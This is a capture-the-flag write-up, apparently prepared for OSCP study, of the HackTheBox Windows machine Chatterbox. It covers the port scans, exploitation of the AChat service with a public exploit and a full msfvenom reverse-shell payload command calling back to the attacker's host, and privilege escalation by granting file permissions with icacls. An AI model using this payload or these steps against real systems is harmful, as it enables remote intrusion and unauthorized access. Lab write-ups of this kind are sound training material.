OSCP PREPROTİONS – HTB Chatterbox

Chatterbox is a vulnerable machine with Windows operating system among retired machines and it is expected to obtain user and rootflags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full port Scan

As a result of the port scan, we encountered many open ports, we enumerated the known ports, first of all, the smb port, we did not get any results on this port. We looked at other ports, but again we did not find an entry point, the ports 9255 and 9256 that we detected in fullscande are remarkable (consecutive port numbers)
Let’s do a detailed version service scan with these

We see that the “AChatchatsystemhttpd” service is open, we make the request.

Let’s search forexploits related to it.
We saw this relatedexploit, we download it and look at the content.

This expoit code runs clac.exe.
Let’s try to edit and run this code.

I think it worked but we don’t know because we can’t see it 🙂 Let’s create code to create revershell with msfvenom
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14. 19 LPORT=4747 -e x86/unicode_mixed – b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX – f python

We created the buf using the command and now we let this buf be the content of the code.
Then we edited the exploit code and ran it

We obtainedshell from user\chatterbox\alfred.

And this is how we got our userflag.
Interestingly, we were able to view the files and folders of the adminstrator user, but we couldn’t read them.

Let’s provide a permission check right here

Here we see that we have authorization in the desktop user, but we do not have authorization to view root.txt.
Now let’s check the authorizations here and then we will define authorization for the Alfred user.
icacls Desktop -> authorization query
icacls root.txt /grantAlfred:(F) -> authorization

This way we were able to read the rootflag.